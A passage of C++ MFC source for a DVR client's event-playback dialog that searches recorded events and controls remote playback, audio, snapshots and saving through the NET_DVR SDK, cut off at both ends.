hPlayWnd);//NULL if (m_lPlayHandle == -1) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PlayBackByTime ChanNum[%d]", m_iChanShowNum); g_StringLanType(szLan, "远程回放失败", "Fail to play back remote"); AfxMessageBox(szLan); return; } int idx = NET_DVR_GetPlayBackPlayerIndex(m_lPlayHandle); g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PlayBackByTime ChanNum[%d]", m_iChanShowNum); NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYSTART, 0, NULL); if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYSTARTAUDIO, 0, NULL)) { m_bSound=TRUE; NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYAUDIOVOLUME, (0xffff)/2, NULL); m_sliderVolume.SetPos(50); ((CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND))->SetIcon(m_hSoundStartIcon); } else { m_bSound=FALSE; ((CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND))->SetIcon(m_hSoundStopIcon); } SetPlayState(); SetTimer(PLAYBYTIME_TIMER, 5000, NULL); } else { if (m_bPause) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYRESTART, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYRESTART"); m_bPause=FALSE; SetPlayState(); } } else { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYPAUSE, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYPAUSE"); m_bPause=TRUE; CButton *pButton; pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPlayEnableIcon); pButton->EnableWindow(TRUE); } } } } /********************************************************* Function: SetPlayState Desc: update the play state Input: Output: Return: **********************************************************/ void CDlgPlayEvent::SetPlayState() { m_sliderVolume.EnableWindow(TRUE); CButton *pButton; pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPauseEnableIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STOP); pButton->SetIcon(m_hStopEnableIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_FAST); pButton->SetIcon(m_hFastEnableIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SLOW); pButton->SetIcon(m_hSlowEnableIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SNATCH_PIC); pButton->SetIcon(m_hCaptureIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND); if (m_bSound) { pButton->SetIcon(m_hSoundStartIcon); } else { pButton->SetIcon(m_hSoundStopIcon); } pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STEP); pButton->SetIcon(m_hStepEnableIcon); pButton->EnableWindow(TRUE); } /********************************************************* Function: SetPauseState Desc: update the pause button state Input: Output: Return: **********************************************************/ void CDlgPlayEvent::SetPauseState() { CButton *pButton; pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPlayEnableIcon); pButton->EnableWindow(TRUE); } /********************************************************* Function: StopPlay Desc: Stop playback Input: Output: Return: **********************************************************/ void CDlgPlayEvent::StopPlay() { if (m_lPlayHandle >= 0) { if (m_bSaveFile) { if (!NET_DVR_StopPlayBackSave(m_lPlayHandle)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_StopPlayBackSave"); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_StopPlayBackSave"); m_bSaveFile = FALSE; } } if (!NET_DVR_StopPlayBack(m_lPlayHandle)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_StopPlayBack"); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_StopPlayBack"); m_bSaveFile = FALSE; } if (m_lPort >= 0) { PlayM4_FreePort(m_lPort); m_lPort = -1; } m_lPlayHandle = -1; KillTimer(REMOTE_PLAY_STATE_TIMER); UpdateData(FALSE); Invalidate(TRUE); } m_bPause = FALSE; m_bSetFrame = FALSE; SetStopState(); } /********************************************************* Function: EnableFlashWnd Desc: refresh the state Input: Output: Return: **********************************************************/ void CDlgPlayEvent::EnableFlashWnd(BOOL bEnable) { if (bEnable) { //THE same to multiplay GetDlgItem(IDC_BTN_EVENT_FILE_PLAY)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_STOP)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_SLOW)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_FAST)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_SOUND)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_SLIDER_EVENT_FILE_VOLUME)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_COMBO_EVENT_DATE_START)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_COMBO_EVENT_DATE_STOP)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_COMBO_EVENT_TIME_STOP)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_COMBO_EVENT_TIME_START)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_COMBO_MAJOR_EVENT)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_SNATCH_PIC)->ModifyStyle(0,WS_VISIBLE,0); //the only for single play GetDlgItem(IDC_BTN_EVENT_FILE_DOWNLOAD)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_LIST_EVENT_FILE)->ModifyStyle(0,WS_VISIBLE,0); GetDlgItem(IDC_BTN_EVENT_FILE_STEP)->ModifyStyle(0,WS_VISIBLE,0); } else { //THE same to multiplay GetDlgItem(IDC_BTN_EVENT_FILE_PLAY)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_STOP)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_SLOW)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_FAST)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_SOUND)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_SLIDER_EVENT_FILE_VOLUME)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_COMBO_EVENT_DATE_START)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_COMBO_EVENT_DATE_STOP)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_COMBO_EVENT_TIME_STOP)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_COMBO_EVENT_TIME_START)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_COMBO_MAJOR_EVENT)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_SNATCH_PIC)->ModifyStyle(WS_VISIBLE,0,0); //the only for single play GetDlgItem(IDC_LIST_EVENT_FILE)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_STEP)->ModifyStyle(WS_VISIBLE,0,0); GetDlgItem(IDC_BTN_EVENT_FILE_DOWNLOAD)->ModifyStyle(WS_VISIBLE,0,0); } } /********************************************************* Function: IsInWnd Desc: make sure the mouse is on this window or not Input: Output: Return: **********************************************************/ BOOL CDlgPlayEvent::IsInWnd(CPoint point) { CRect rc; GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->GetWindowRect(&rc); ScreenToClient(&rc); if (PtInRect(&rc,point)) { return TRUE; } else { return FALSE; } } /********************************************************* Function: PlayBackFullScreen Desc: full screen Input: Output: Return: **********************************************************/ void CDlgPlayEvent::PlayBackFullScreen() { EnableFlashWnd(FALSE); CRect rc,rcClient; ::GetWindowRect(m_hPareDlgWnd,m_rcPareDlg); ::GetWindowRect(m_hPareTabWnd,m_rcPareTab); ::ScreenToClient(m_hPareDlgWnd,(POINT*)(&m_rcPareTab)); ::ScreenToClient(m_hPareDlgWnd,(POINT*)(&m_rcPareTab)+1); ::GetWindowRect(m_hWnd,m_rcParent); ::ScreenToClient(m_hPareTabWnd,(POINT*)(&m_rcParent)); ::ScreenToClient(m_hPareTabWnd,(POINT*)(&m_rcParent)+1); ::SetWindowPos(m_hPareDlgWnd,NULL,m_rcScreen.left-SCREEN_EDGE,m_rcScreen.top-SCREEN_EDGE,m_rcScreen.Width()+2*SCREEN_EDGE,m_rcScreen.Height()+2*SCREEN_EDGE,SWP_SHOWWINDOW); ::GetClientRect(m_hPareDlgWnd,rc); ::SetWindowPos(m_hPareTabWnd,NULL,rc.left,rc.top,rc.Width(),rc.Height(),SWP_SHOWWINDOW); ::GetClientRect(m_hPareTabWnd,rc); ::SetWindowPos(m_hWnd,NULL,rc.left,rc.top,rc.Width(),rc.Height(),SWP_SHOWWINDOW); GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->GetClientRect(rcClient); GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->GetWindowRect(rc); int iEdge=(rc.Width()-rcClient.Width())/2; rc=m_rcScreen; rc.left-=iEdge; rc.right+=iEdge; rc.top-=iEdge; rc.bottom+=iEdge; this->ScreenToClient(rc); ::SetWindowPos(GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->m_hWnd,NULL,rc.left,rc.top,rc.Width(),rc.Height(),SWP_SHOWWINDOW); Invalidate(FALSE); UpdateWindow(); } /********************************************************* Function: PlayBackShowNormal Desc: back to the normal show Input: Output: Return: **********************************************************/ void CDlgPlayEvent::PlayBackShowNormal() { GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->SetWindowPos(NULL,m_rcWnd.left,m_rcWnd.top,m_rcWnd.Width(),m_rcWnd.Height(),SWP_SHOWWINDOW); ::SetWindowPos(m_hWnd,NULL,m_rcParent.left,m_rcParent.top,m_rcParent.Width(),m_rcParent.Height(),SWP_SHOWWINDOW); ::SetWindowPos(m_hPareTabWnd,NULL,m_rcPareTab.left,m_rcPareTab.top,m_rcPareTab.Width(),m_rcPareTab.Height(),SWP_SHOWWINDOW); ::SetWindowPos(m_hPareDlgWnd,NULL,m_rcPareDlg.left,m_rcPareDlg.top,m_rcPareDlg.Width(),m_rcPareDlg.Height(),SWP_SHOWWINDOW); EnableFlashWnd(TRUE); Invalidate(FALSE); UpdateWindow(); } /********************************************************* Function: OnDestroy Desc: Destroy dialog when exiting Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnDestroy() { KillTimer(DOWNSTATE_TIMER); CDialog::OnDestroy(); } /********************************************************* Function: OnNMDblclkListRemoteFile Desc: play the selected file Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnNMDblclkListRemoteFile(NMHDR *pNMHDR, LRESULT *pResult) { OnBnClickedBtnRemoteFileStop(); OnBnClickedBtnRemoteFilePlay(); *pResult = 0; } /********************************************************* Function: OnLButtonDblClk Desc: Enlarge image by double click Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnLButtonDblClk(UINT nFlags, CPoint point) { // TODO: Add your message handler code here and/or call default if ((IsInWnd(point)) && (m_lPlayHandle>=0)) { m_bFullScreen=!m_bFullScreen; g_pMainDlg->FullScreen(m_bFullScreen);//process of main frame if (m_bFullScreen) { PlayBackFullScreen(); } else { PlayBackShowNormal(); } } CDialog::OnLButtonDblClk(nFlags, point); } /********************************************************* Function: OnTimer Desc: Function for Timer, show the status of download and playback Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnTimer(UINT nIDEvent) { DWORD nPos; char szLan[128] = {0}; // NET_DVR_TIME struOsdTime; if (nIDEvent == PLAYBYTIME_TIMER) { if (m_lPlayHandle >= 0) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYGETPOS, 0, &nPos)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYGETPOS pos[%d]", nPos); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYGETPOS"); } // if (NET_DVR_GetPlayBackOsdTime(m_lPlayHandle, &struOsdTime)) // { // g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "OSDTime: %04d%02d%02d%02d%02d%02d", \ // struOsdTime.dwYear, struOsdTime.dwMonth,struOsdTime.dwDay, struOsdTime.dwHour, struOsdTime.dwMinute, struOsdTime.dwSecond); // } // else // { // g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_GetPlayBackOsdTime"); // } if (nPos > 100) { StopPlay(); g_StringLanType(szLan, "由于网络原因或DVR忙,回放异常终止!", " Due to network reasons or DVR is busy, playback abnormal termination"); AfxMessageBox(szLan); } if (nPos == 100) { StopPlay(); g_StringLanType(szLan, "按时间回放结束", "playback by time over"); AfxMessageBox(szLan); } } } // else if (nIDEvent == DOWNBYTIME_TIMER) // { // if (m_bDown) // { // NET_DVR_PlayBackControl(m_lLoadHandle, NET_DVR_PLAYGETPOS, 0, &nPos); // if (nPos > 100) // { // m_bDown=FALSE; // NET_DVR_StopGetFile(m_lLoadHandle); // g_StringLanType(szLan, "下载", "Download"); // GetDlgItem(IDC_BTN_RT_DOWNLOAD)->SetWindowText(szLan); // g_StringLanType(szLan, "由于网络原因或DVR忙,下载异常终止!", " Due to network reasons or DVR is busy, download abnormal termination"); // AfxMessageBox(szLan); // } // if (nPos == 100) // { // m_bDown=FALSE; // NET_DVR_StopGetFile(m_lLoadHandle); // g_StringLanType(szLan, "下载", "Download"); // GetDlgItem(IDC_BTN_RT_DOWNLOAD)->SetWindowText(szLan); // g_StringLanType(szLan, "按时间下载结束", "download by time over"); // AfxMessageBox(szLan); // } // } // } CDialog::OnTimer(nIDEvent); } /********************************************************* Function: OnBnClickedBtnRemoteSearchList Desc: function for search video by time or card NO. Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteSearchList() { UpdateData(TRUE); char szLan[128] = {0}; if (!m_bSearching) { m_IsQuit = TRUE; m_iMajorType = m_comboMajorType.GetCurSel(); m_struEventParam.wMajorType = m_iMajorType; int i = m_comboMinorEvent.GetCurSel(); m_struEventParam.wMinorType = m_comboMinorEvent.GetItemData(i); m_struEventParam.struStartTime.dwYear = (WORD)m_ctDateStart.GetYear(); m_struEventParam.struStartTime.dwMonth = (WORD)m_ctDateStart.GetMonth(); m_struEventParam.struStartTime.dwDay = (WORD)m_ctDateStart.GetDay(); m_struEventParam.struStartTime.dwHour = (char)m_ctTimeStart.GetHour(); m_struEventParam.struStartTime.dwMinute = (char)m_ctTimeStart.GetMinute(); m_struEventParam.struStartTime.dwSecond = (char)m_ctTimeStart.GetSecond(); m_struEventParam.struEndTime.dwYear = (WORD)m_ctDateStop.GetYear(); m_struEventParam.struEndTime.dwMonth = (WORD)m_ctDateStop.GetMonth(); m_struEventParam.struEndTime.dwDay = (WORD)m_ctDateStop.GetDay(); m_struEventParam.struEndTime.dwHour = (char)m_ctTimeStop.GetHour(); m_struEventParam.struEndTime.dwMinute = (char)m_ctTimeStop.GetMinute(); m_struEventParam.struEndTime.dwSecond = (char)m_ctTimeStop.GetSecond(); //the state is signed in updateChanStatus m_lDeviceType = g_struDeviceInfo[m_iDeviceIndex].iDeviceType; switch(m_iMajorType) { case EVENT_ALARM_IN: case EVENT_MOT_DET: case EVENT_AUX_ALARM: break; case EVENT_VCA_BEHAVIOR: m_struEventParam.uSeniorParam.struVcaParam.byRuleID = m_comboRuleID.GetItemData(m_comboRuleID.GetCurSel()); break; default: break; } m_lFileHandle = NET_DVR_FindFileByEvent(m_lLoginID, &m_struEventParam); if (m_lFileHandle < 0) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_FindFileByEvent"); g_StringLanType(szLan, "获取文件列表失败!", "Fail to get file list"); AfxMessageBox(szLan); return; } m_listRemoteFile.DeleteAllItems(); DWORD dwThreadId; if (m_hFileThread == NULL) { m_hFileThread = CreateThread(NULL,0,LPTHREAD_START_ROUTINE(GetEventThread),this,0,&dwThreadId); } if (m_hFileThread == NULL) { g_StringLanType(szLan, "打开查找线程失败!", "Fail to open finding thread!"); AfxMessageBox(szLan); return; } g_StringLanType(szLan, "停止查找", "Stop Searching"); GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->SetWindowText(szLan); m_bSearching = TRUE; GetDlgItem(IDC_STATIC_EVENT_SEARCH_STATE)->ShowWindow(SW_SHOW); } else { if (m_hFileThread) { m_IsQuit = FALSE; //TerminateThread(m_hFileThread, 0); } CloseHandle(m_hFileThread); m_hFileThread = NULL; NET_DVR_FindClose(m_lFileHandle); g_StringLanType(szLan, "查找", "Search"); GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->SetWindowText(szLan); m_bSearching = FALSE; GetDlgItem(IDC_STATIC_EVENT_SEARCH_STATE)->ShowWindow(SW_HIDE); m_iFileNum = 0; } } /********************************************************* Function: OnBnClickedBtnRemoteFilePlay Desc: Function for start playback Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFilePlay() { if (m_lPlayHandle == -1) { PlayBack(); } else { if (m_bPause) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYRESTART, 0, NULL)) { m_bPause=FALSE; SetPlayState(); } } else { if (m_bSetFrame || m_bChangeSpeed) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYNORMAL, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYNORMAL"); m_bSetFrame=FALSE; m_bChangeSpeed = FALSE; SetPlayState(); } } else { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYPAUSE, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYPAUSE"); m_bPause=TRUE; SetPauseState(); } if (!NET_DVR_RefreshPlay(m_lPlayHandle)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_RefreshPlay"); } } } } } /********************************************************* Function: OnBnClickedBtnRemoteFileStop Desc: stop playback Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileStop() { StopPlay(); } /********************************************************* Function: OnBnClickedBtnRemoteFileSave Desc: downlaod remote file Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileSave() { static char szFilter[]="All File(*.mp4)|*.*||"; char m_sFile[256] = "c:\\Savefile.mp4"; CString csFile; CFileDialog dlg(FALSE,"*.mp4","Savefile.mp4",OFN_OVERWRITEPROMPT|OFN_HIDEREADONLY, szFilter); if (dlg.DoModal()==IDOK) { csFile = dlg.GetPathName(); UpdateData(FALSE); sprintf(m_sFile, "%s", csFile); } if (NET_DVR_PlayBackSaveData(m_lPlayHandle, m_sFile)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PlayBackSaveData[%s]", m_sFile); m_bSaveFile = TRUE; } else { char szLan[128] = {0}; g_StringLanType(szLan, "文件保存失败", "Save the file failed"); AfxMessageBox(szLan); } } /********************************************************* Function: OnBnClickedBtnRemoteFileStopSave Desc: stop downlaod remote file Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileStopSave() { if (m_bSaveFile) { NET_DVR_StopPlayBackSave(m_lPlayHandle); m_bSaveFile = FALSE; char szLan[128] = {0}; g_StringLanType(szLan, "停止保存成功", "Save the file successfully"); AfxMessageBox(szLan); } } /********************************************************* Function: OnBnClickedBtnRemoteFileGotoBeginning Desc: return to the begion of current file and play, Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileGotoBeginning() { if (NET_DVR_PlayBackControl(m_lPlayHandle,NET_DVR_PLAYSETPOS, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYSETPOS goto beginning"); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYSETPOS goto beginning"); } } /********************************************************* Function: OnBnClickedBtnRemoteFileFast Desc: playback faster Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileFast() { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYFAST, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYFAST"); m_bChangeSpeed = TRUE; } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYFAST"); } } /********************************************************* Function: OnBnClickedBtnRemoteFileSlow Desc: playback slower Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileSlow() { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYSLOW, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYSLOW"); m_bChangeSpeed = TRUE; } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYSLOW"); } } /********************************************************* Function: OnBnClickedBtnRemoteFileSnatchPic Desc: Take snapshot of current palyback file Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileSnatchPic() { char cFilename[256] = {0}; sprintf(cFilename, "%s\\%d_%d.bmp",g_struLocalParam.chPictureSavePath,m_iChanShowNum, GetTickCount()); if (NET_DVR_PlayBackCaptureFile(m_lPlayHandle,cFilename)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "%s NET_DVR_PlayBackCaptureFile",cFilename); return; } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PlayBackCaptureFile"); } } /********************************************************* Function: OnBnClickedBtnRemoteFileStep Desc: playback single frame Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileStep() { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYFRAME, 0, NULL)) { CButton *pButton; pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPlayEnableIcon); pButton->EnableWindow(TRUE); m_bSetFrame = TRUE; g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYFRAME"); } } /********************************************************* Function: OnBnClickedBtnRemoteFileSound Desc: open/close audio Input: Output: Return: **********************************************************/ void CDlgPlayEvent::OnBnClickedBtnRemoteFileSound() { CButton *pButton; if (m_bSound) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYSTOPAUDIO, 0, NULL)) { m_bSound=FALSE; pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND); pButton->SetIcon(m_hSoundStopIcon); GetDlgItem(IDC_SLIDER_EVENT_FILE_VOLUME)->EnableWindow(FALSE); g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYSTOPAUDIO %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYSTOPAUDIO %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); } } else { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYSTARTAUDIO, 0, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYSTOPAUDIO %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND); GetDlgItem(IDC_SLIDER_EVENT_FILE_VOLUME)->EnableWindow(TRUE); pButton->SetIcon(m_hSoundStartIcon); m_bSound=TRUE; } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYSTOPAUDIO %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); } } } /********************************************************* Function: OnClickListRemoteFile Desc: resolve the time of the event Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::OnClickListRemoteFile(NMHDR* pNMHDR, LRESULT* pResult) { LPNMHEADER phdr = reinterpret_cast<LPNMHEADER>(pNMHDR); POSITION iPos = m_listRemoteFile.GetFirstSelectedItemPosition(); if (iPos == NULL) { return; } char szTime[32] = {0}; char szTmp[8] = {0}; int iOffset = 0; m_iItemSel = m_listRemoteFile.GetNextSelectedItem(iPos); sprintf(szTime, "%s", m_listRemoteFile.GetItemText(m_iItemSel, 1));//start memcpy(szTmp, szTime, 4); m_struStartTime.dwYear = atoi(szTmp); iOffset+=4; memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStartTime.dwMonth = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStartTime.dwDay = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStartTime.dwHour = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStartTime.dwMinute = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStartTime.dwSecond = atoi(szTmp); memset(szTime, 0, 32); sprintf(szTime, "%s", m_listRemoteFile.GetItemText(m_iItemSel, 2));//stop time iOffset=0;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 4); m_struStopTime.dwYear = atoi(szTmp); iOffset+=4;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStopTime.dwMonth = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStopTime.dwDay = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStopTime.dwHour = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStopTime.dwMinute = atoi(szTmp); iOffset+=2;memset(szTmp, 0, 8); memcpy(szTmp, szTime+iOffset, 2); m_struStopTime.dwSecond = atoi(szTmp); UpdateData(FALSE); *pResult = 0; } /********************************************************* Function: OnCtlColor Desc: refresh the window Input: void Output: void Return: void **********************************************************/ HBRUSH CDlgPlayEvent::OnCtlColor(CDC* pDC, CWnd* pWnd, UINT nCtlColor) { HBRUSH hbr = CDialog::OnCtlColor(pDC, pWnd, nCtlColor); // TODO: Change any attributes of the DC here if (m_lPlayHandle < 0 || !m_bPause) { return hbr; } if (!NET_DVR_RefreshPlay(m_lPlayHandle)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_RefreshPlay"); } // TODO: Return a different brush if the default is not desired return hbr; } /********************************************************* Function: OnReleasedcaptureSliderRemoteFileVolume Desc: responding to mouse up message of volume progress Input: pNMHDR, point to NMHDR; pResult, point to LRESULT; Output: none Return: none **********************************************************/ void CDlgPlayEvent::OnReleasedcaptureSliderRemoteFileVolume(NMHDR* pNMHDR, LRESULT* pResult) { UpdateData(TRUE); WORD temp = (0xffff)/100; WORD dwVolume = 0; char chPos = 0; chPos =(char)m_sliderVolume.GetPos(); dwVolume =(WORD) (chPos*temp); m_sliderVolume.SetPos(chPos); if (m_lPlayHandle >= 0) { if (NET_DVR_PlayBackControl(m_lPlayHandle, NET_DVR_PLAYAUDIOVOLUME, dwVolume, NULL)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_PLAYAUDIOVOLUME %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); } else { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_FAIL_T, "NET_DVR_PLAYAUDIOVOLUME %s", g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].chChanName); } } *pResult = 0; } /********************************************************* Function: OnClickListChan Desc: refresh the channels's selected state Input: void Output: void Return: void **********************************************************/ void CDlgPlayEvent::OnClickListChan(NMHDR* pNMHDR, LRESULT* pResult) { // TODO: Add your control notification handler code here UpdateData(TRUE); //POSITION iPos = m_listChan.GetFirstSelectedItemPosition();//is not useful for small icon list LPNMHEADER phdr = reinterpret_cast<LPNMHEADER>(pNMHDR); DWORD dwPos = GetMessagePos(); CPoint point( LOWORD(dwPos), HIWORD(dwPos)); m_listChan.ScreenToClient(&point); UINT uFlag = 